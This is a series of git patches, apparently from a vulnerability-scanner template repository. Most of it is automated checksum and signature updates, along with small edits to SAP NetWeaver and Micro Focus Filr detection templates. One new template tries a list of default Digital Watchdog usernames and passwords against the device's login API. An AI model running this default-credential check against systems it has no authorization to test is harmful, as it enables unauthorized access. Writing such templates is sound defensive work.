@@ network/enumeration/kafka-topics-list.yaml:a806b0049ffc95034dc2fb163548ee8765bd3 network/enumeration/mongodb-info-enum.yaml:5f1b2b25b89f10477193793aa775b9aac5fcc019 network/enumeration/niagara-fox-info-enum.yaml:5b94264b3accb70d345258192f5ab98c4e222d83 network/enumeration/psql-user-enum.yaml:7522ae086ec23f345af67bc13129c810f22a6d94 -network/enumeration/smtp/smtp-commands-enum.yaml:181e00f5c334ace6798267b12d1e5525b2cd5930 -network/enumeration/smtp/smtp-user-enum.yaml:bc9bbcc16ad5d94d239ecfd034601262b903f15b +network/enumeration/smtp/smtp-commands-enum.yaml:60471df0fd3aa24988465ae6514305d534e32d9f +network/enumeration/smtp/smtp-user-enum.yaml:b06c3dfe3c14149816325f2b24671e092410acfe network/exposures/cisco-smi-exposure.yaml:d4cc1333b0ece863dd0a987c3f7cb59c9489f5e8 network/exposures/exposed-adb.yaml:e758a0fcbdad2ce08ea1985b9b4c6721feafd8c5 network/exposures/exposed-dockerd.yaml:351e18b9fea269da82ff3b3d5a5460179e9a6789 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a17fe018bfb1c5241549fb7227553495fb52cbcd +templates-checksum.txt:37576e2badae7ce2223f7aea4797445646143d84 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ca86b414a9c76da876f5e074ee33283801076127 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 06:27:23 +0000 Subject: [PATCH 1343/1768] Auto Generated Templates Checksum [Mon May 27 06:27:23 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a4654fdb40..817394d231 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8421,8 +8421,8 @@ network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb network/detection/detect-addpac-voip-gateway.yaml:a06e5be5c8af1fc7e79ed9011ba9c91403d1069f network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8da4 network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf -network/detection/esmtp-detect.yaml:dee11038a25d263f8b3d0f06ad53fb2b84a44c2a -network/detection/exim-detect.yaml:c9541f70a921c64575e67ed7c7e0a364a28c613e +network/detection/esmtp-detect.yaml:95382976e7ca8c41cc9ad06ac55d64033fbb9181 +network/detection/exim-detect.yaml:12ecf40a7d27e1c6ae0a4328a727c5c1119f5b75 network/detection/expn-mail-detect.yaml:53d80f2928345819aa20811d080b66a1607f9008 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf @@ -8457,7 +8457,7 @@ network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6 network/detection/starttls-mail-detect.yaml:8714db63581c72fbbe8d013abb39f7c46c03d3a2 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 -network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a77a5be5 +network/detection/totemomail-smtp-detect.yaml:fe08b19192b77bb003c249863c65a28a2990f5a9 network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:37576e2badae7ce2223f7aea4797445646143d84 +templates-checksum.txt:ab6335c8e17345ec90ec96e8c383b28993e52f7f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b1b2d7bcf6d31f3166dbc829f1f94afbd61a3509 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 06:27:58 +0000 Subject: [PATCH 1344/1768] Auto Template Signing [Mon May 27 06:27:58 UTC 2024] :robot: --- network/detection/expn-mail-detect.yaml | 2 +- network/detection/starttls-mail-detect.yaml | 2 +- network/enumeration/smtp/smtp-commands-enum.yaml | 2 +- network/enumeration/smtp/smtp-user-enum.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index 6c43bc92d8..bcd85bb449 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -24,4 +24,4 @@ tcp: - type: word words: - "250-EXPN" -# digest: 4a0a00473045022100c110a2bcc4816eacb0939cbe935de97631fceda60c44df0902418c1701033d600220116579bb0301a5094bae8ef301293db3cdd2c5e6f93412da161b9acc9f994025:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b256db9abd968efc56eff218a116592ad083cbef2210d8d7a8b60648666f46ab0220169e2372547dd7c1b0da314893f06695593ed32c69581a311a24edde16f1bbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index 45e0be3e07..c08e550132 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -24,4 +24,4 @@ tcp: - type: word words: - "250-STARTTLS" -# digest: 4a0a00473045022100b8e2e6513b9a00666a2ee07a825cbf66e2bb8f4c3198978baa7fcb6b2e68ca5d02202d5e30193d2420cff48017b05dec81fbf711fa2282e008d5fb8eb86da456800e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220727f60dda614097e482aeab0ed892781d6ecc9a8649f6d4b8cce021b88bd15c10220174928b249976388915a9d4b85214a5f9e32c9611b02bc3ad711e855c38cd370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/enumeration/smtp/smtp-commands-enum.yaml b/network/enumeration/smtp/smtp-commands-enum.yaml index 95ad692f83..6388ecc749 100644 --- a/network/enumeration/smtp/smtp-commands-enum.yaml +++ b/network/enumeration/smtp/smtp-commands-enum.yaml @@ -36,4 +36,4 @@ tcp: - type: regex regex: - '214 (.*)' -# digest: 4a0a0047304502205560bdb073316213380e8fde2d30d6087829d64351e9bae564928f313866b614022100dc2fec1faec01e87b86aecb89ee3e25447f17835b755bf835eaf0bb948ab9cd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4585711b7a7cb8e55dc6af887e5ce42d394d487fcb65b8c2f945ee6f2bd93d302200848147d0b02629fd5590402add0aa646c3f05090f381d2db4a45e7edf7a08d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index b8bfad3a4f..42a5bde0f2 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -38,4 +38,4 @@ tcp: - "252" - "250" condition: or -# digest: 4a0a00473045022041e42f434ed812668104392bfab3a1a2d6356cad0479e998247f689f925e5f38022100dec72375a0062cbb17cf3aebee222c0992e8d20f9917e2824d5c315190cbd164:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e244c7d92331fb357eefd1fc3114fee12dc7a6022ea35a3a42307971934b88602210093a41a1472138e79b70d1cccb2c675e594dc98761d6a1f4a7e400d5246e60661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f5e0edfade5785898f4d3732b65a28f2d12ca960 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 07:44:35 +0000 Subject: [PATCH 1346/1768] Auto Generated Templates Checksum [Mon May 27 07:44:35 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 817394d231..a41f6b36a5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8344,7 +8344,7 @@ javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df -javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16 +javascript/enumeration/minecraft-enum.yaml:27f745158a79ebd71a7854dc0f4f6da25fc9d7ab javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 @@ -8423,7 +8423,7 @@ network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8d network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf network/detection/esmtp-detect.yaml:95382976e7ca8c41cc9ad06ac55d64033fbb9181 network/detection/exim-detect.yaml:12ecf40a7d27e1c6ae0a4328a727c5c1119f5b75 -network/detection/expn-mail-detect.yaml:53d80f2928345819aa20811d080b66a1607f9008 +network/detection/expn-mail-detect.yaml:cd8960152e5b6a4777ec6950528164ba48983d81 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf network/detection/gopher-detect.yaml:fc44051b14f3cb7f8b70dddba8231ea83d5e4dbd @@ -8454,7 +8454,7 @@ network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 network/detection/smb-detect.yaml:dca4a7005c959c0a407f6413b3e89638c485ff13 network/detection/smtp-detect.yaml:5fa2e7cef1d9aec1de4c88d093d974c897f4dc9d network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f -network/detection/starttls-mail-detect.yaml:8714db63581c72fbbe8d013abb39f7c46c03d3a2 +network/detection/starttls-mail-detect.yaml:5d06e17119e499ff79a593821eae44d928007c69 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 network/detection/totemomail-smtp-detect.yaml:fe08b19192b77bb003c249863c65a28a2990f5a9 @@ -8470,8 +8470,8 @@ network/enumeration/kafka-topics-list.yaml:a806b0049ffc95034dc2fb163548ee8765bd3 network/enumeration/mongodb-info-enum.yaml:5f1b2b25b89f10477193793aa775b9aac5fcc019 network/enumeration/niagara-fox-info-enum.yaml:5b94264b3accb70d345258192f5ab98c4e222d83 network/enumeration/psql-user-enum.yaml:7522ae086ec23f345af67bc13129c810f22a6d94 -network/enumeration/smtp/smtp-commands-enum.yaml:60471df0fd3aa24988465ae6514305d534e32d9f -network/enumeration/smtp/smtp-user-enum.yaml:b06c3dfe3c14149816325f2b24671e092410acfe +network/enumeration/smtp/smtp-commands-enum.yaml:18d2f3bfd9cb5c151953a1b77bb5e697bce6bbf7 +network/enumeration/smtp/smtp-user-enum.yaml:9c22817e414338d8cea89f836cce246887bd9b52 network/exposures/cisco-smi-exposure.yaml:d4cc1333b0ece863dd0a987c3f7cb59c9489f5e8 network/exposures/exposed-adb.yaml:e758a0fcbdad2ce08ea1985b9b4c6721feafd8c5 network/exposures/exposed-dockerd.yaml:351e18b9fea269da82ff3b3d5a5460179e9a6789 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ab6335c8e17345ec90ec96e8c383b28993e52f7f +templates-checksum.txt:c5704abafa33469ed485807c267b56abaddf6952 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 38e83e7844877a95374a466f8f0f3db09d0d4c1d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 07:46:13 +0000 Subject: [PATCH 1347/1768] Auto Template Signing [Mon May 27 07:46:13 UTC 2024] :robot: --- javascript/enumeration/minecraft-enum.yaml | 2 +- network/detection/esmtp-detect.yaml | 2 +- network/detection/exim-detect.yaml | 2 +- network/detection/totemomail-smtp-detect.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index c5baa4a68a..aae2507b33 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -45,4 +45,4 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a0048304602210097a010ea589db898dd8dfb9813cef0ddf6a92c583644a11ed95aa50ef8147b28022100ea4cfe825571c9cf2c1afc8dd0db45993bbd5e5b5145b18485b60ea965d66fc1:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220389a4d037f4807679f2ae67a85add1c5efd5ca8525016010c3c3553b6fa59f7e02201f1ba4c1bdc64bb94f2c44f8b7b147a7a2360d753e8e2af17553268c8537ac3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 7b353af8ef..0f5937ac2c 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -32,4 +32,4 @@ tcp: - "ESMTP Postfix" - "220" condition: and -# digest: 490a0046304402203a1fffa26c753ac23dccc2377fa851d78256f56ea912590637a203aaa55268ab02202f61ea792860ccb76be454a7b4a39ea73419a3c33b13d95ded5f83129df47780:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022011a51b24502628782eca7789641c27bf2c980f0af2521e85997ad491e3bded2302204c4c0e4ec61f9bbd9e41af502ac1a2247b838d7eaed110ab01ea86447037d8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/exim-detect.yaml b/network/detection/exim-detect.yaml index 63006cd2cd..1bc94ab45f 100644 --- a/network/detection/exim-detect.yaml +++ b/network/detection/exim-detect.yaml @@ -36,4 +36,4 @@ tcp: name: version regex: - '(?i)SMTP.Exim\s?([\w.]+)' -# digest: 490a004630440220178c0408f24267ad4993879d249bd7489f055dab96177bbab6bfbc09731946f702200318d596f7942d10eb22ea4fb10ff9c1ee01654703abdeee1fff721c0209368f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027e56f04ab5d482b5ab43df544ae76da503a2d5df4e7ca14da7cf410b0a5f768022100b8cb5ab3532efb070351de9754c67daaff4dcbf6d0ac8c30d80260f6ed6097a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 57d7e92b84..09fa959d21 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -23,4 +23,4 @@ tcp: - type: word words: - "totemomail" -# digest: 4b0a00483046022100b67feef4821f9caec50eb6a57ec9cbe55b79ecd74e8589a3037158853ceea7be022100a0eca77f9a05c0a32c8233db8d60135673e52050c80ddc4b58310a1fb185a246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ad0098adfce5d43092de486498d8b9a43d658ce1534daa9c3004100de00160c5022100a85b9073683e373bdb27ded8339335735adf325a53a80155c76af84f23c41758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 82f5a2e467a20cade79a14929f70a5cc18a919a7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:27:28 +0530 Subject: [PATCH 1348/1768] updated matchers --- http/technologies/sap/sap-netweaver-detect.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index 9c80b45879..9ea5d6e1f9 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -1,14 +1,17 @@ id: sap-netweaver-detect info: - name: SAP NetWeaver ICM Detection + name: SAP NetWeaver ICM - Detect author: randomstr1ng,righettod severity: info - description: Detection of SAP NetWeaver ABAP Webserver or Java Application Server (ICM/ICF) + description: | + Detection of SAP NetWeaver ABAP Webserver or Java Application Server (ICM/ICF) metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: sap,webserver,tech + fofa-query: "sap-server:" + tags: sap,webserver,tech,detect http: - method: GET @@ -19,13 +22,13 @@ http: max-redirects: 2 matchers-condition: or matchers: - - type: regex + - type: word part: header - regex: + words: - "sap-server:" - - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + case-insensitive: true - type: word part: body From 4cba0589a166f7010427ca151aad97731420d4ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:29:48 +0530 Subject: [PATCH 1349/1768] Update microfocus-filr-panel.yaml --- http/exposed-panels/microfocus-filr-panel.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 8aa1782d6b..aa2e673119 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -11,11 +11,11 @@ info: cpe: cpe:2.3:a:microfocus:filr:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: filr - shodan-query: http.html:"Micro Focus Filr" - vendor: microfocus verified: true - tags: panel,microfocus,filr + product: filr + vendor: microfocus + shodan-query: http.html:"Micro Focus Filr" + tags: panel,microfocus,filr,detect http: - method: GET @@ -45,4 +45,4 @@ http: part: body group: 1 regex: - - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file + - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' From 3c73e13b6877cbaead998664bf46234a13c61089 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:40:27 +0530 Subject: [PATCH 1350/1768] Create digital-watchdog-default-login.yaml --- .../digital-watchdog-default-login.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/default-logins/digital-watchdog-default-login.yaml diff --git a/http/default-logins/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog-default-login.yaml new file mode 100644 index 0000000000..f0dae8cda5 --- /dev/null +++ b/http/default-logins/digital-watchdog-default-login.yaml @@ -0,0 +1,43 @@ +id: digital-watchdog-default-login + +info: + name: Digital Watchdog - Default Login + author: omranisecurity + severity: high + description: | + Digital Watchdog default login credentials were discovered. + reference: + - https://digitalwatchdog.happyfox.com/kb/article/686-recorder-and-raid-default-login-list/ + metadata: + verified: true + shodan-query: http.favicon.hash:868509217 + fofa-query: icon_hash="868509217" + tags: digital-watchdog,default-login,dw-Spectrum + +http: + - raw: + - | + POST /web/rest/v1/login/sessions HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{user}}","password":"{{pass}}","setCookie":true} + + attack: clusterbomb + payloads: + user: + - admin + - dwuser + pass: + - admin + - admin1234 + - admin12345 + - Dw5pectrum + + matchers: + - type: dsl + dsl: + - 'contains_all(set_cookie, "x-runtime-guid=")' + - 'contains(body, "token\":")' + - 'status_code == 200' + condition: and From 433c4cace8222bf99936b154e4ba7e8487b69c21 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 27 May 2024 13:43:21 +0530 Subject: [PATCH 1351/1768] error fix --- http/default-logins/digital-watchdog-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog-default-login.yaml index f0dae8cda5..a872682d03 100644 --- a/http/default-logins/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog-default-login.yaml @@ -16,7 +16,7 @@ info: http: - raw: - - | + - | POST /web/rest/v1/login/sessions HTTP/1.1 Host: {{Hostname}} Content-Type: application/json From 6c428681c30a9e6d74f3e360fcbfa6c69496ff3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 13:57:14 +0530 Subject: [PATCH 1352/1768] Rename http/default-logins/digital-watchdog-default-login.yaml to http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml --- .../{ => digital-watchdog}/digital-watchdog-default-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/default-logins/{ => digital-watchdog}/digital-watchdog-default-login.yaml (100%) diff --git a/http/default-logins/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml similarity index 100% rename from http/default-logins/digital-watchdog-default-login.yaml rename to http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml From 1ea5fe2606f56b4eb2ece10dd858c7babd074959 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:28:11 +0000 Subject: [PATCH 1353/1768] Auto Generated Templates Checksum [Mon May 27 08:28:11 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a41f6b36a5..e4e7187877 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6935,7 +6935,7 @@ http/technologies/rsshub-detect.yaml:78befe0bfa5036aea006bfb433aa5e8b20f6eb5e http/technologies/s3-detect.yaml:17054560fae17482a2b175a5c0c9baad426c5a6a http/technologies/samsung-smarttv-debug.yaml:25586370a97a672fd2bb066dd4d5fd6c671e4302 http/technologies/sap/sap-igs-detect.yaml:3023bc9a78e2e76f340362a467fd237d2a24ef9e -http/technologies/sap/sap-netweaver-detect.yaml:4bf5e37b8d6972a0ab544bb7efe2f4e795577a59 +http/technologies/sap/sap-netweaver-detect.yaml:edb9019351db31f4db98b9df2426ed0f63d38359 http/technologies/sap/sap-netweaver-webgui.yaml:44bdfe780e8dd940ce87f592cb74595e0ea9b052 http/technologies/sap/sap-web-dispatcher-admin-portal.yaml:2b92bc6c5e85d8fd6ec692c484964dd98db2ef0d http/technologies/sap/sap-web-dispatcher.yaml:c54fcf650d5eb35ed5f774056cb21cee58392944 @@ -8344,7 +8344,7 @@ javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df -javascript/enumeration/minecraft-enum.yaml:27f745158a79ebd71a7854dc0f4f6da25fc9d7ab +javascript/enumeration/minecraft-enum.yaml:b479fd24c897f43fa8931185c0dd0b03e4a57c5a javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 @@ -8421,8 +8421,8 @@ network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb network/detection/detect-addpac-voip-gateway.yaml:a06e5be5c8af1fc7e79ed9011ba9c91403d1069f network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8da4 network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf -network/detection/esmtp-detect.yaml:95382976e7ca8c41cc9ad06ac55d64033fbb9181 -network/detection/exim-detect.yaml:12ecf40a7d27e1c6ae0a4328a727c5c1119f5b75 +network/detection/esmtp-detect.yaml:132acdd524e1d1c32442a9fa82f3632eb0afd7e1 +network/detection/exim-detect.yaml:c5cf41f9583a59688faba62dd6c08fa9bb0e6c79 network/detection/expn-mail-detect.yaml:cd8960152e5b6a4777ec6950528164ba48983d81 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf @@ -8457,7 +8457,7 @@ network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6 network/detection/starttls-mail-detect.yaml:5d06e17119e499ff79a593821eae44d928007c69 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 -network/detection/totemomail-smtp-detect.yaml:fe08b19192b77bb003c249863c65a28a2990f5a9 +network/detection/totemomail-smtp-detect.yaml:255495f466146abd4f4fafed68a703e8ddc646aa network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c5704abafa33469ed485807c267b56abaddf6952 +templates-checksum.txt:505c98612682a0603c5b64da1ab9cc8adcca8d55 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 58c407ea8d7b1cea344a639880d0494516563c13 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:28:49 +0000 Subject: [PATCH 1355/1768] Auto Generated Templates Checksum [Mon May 27 08:28:49 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e4e7187877..2ce8921ee7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4061,7 +4061,7 @@ http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 -http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 +http/exposed-panels/microfocus-filr-panel.yaml:c235633a12af9ea65ce3e61eadae5492bd68b5f7 http/exposed-panels/microfocus-lifecycle-panel.yaml:e24f25ddf4c8adcddde94e8284c533410f54b8bb http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 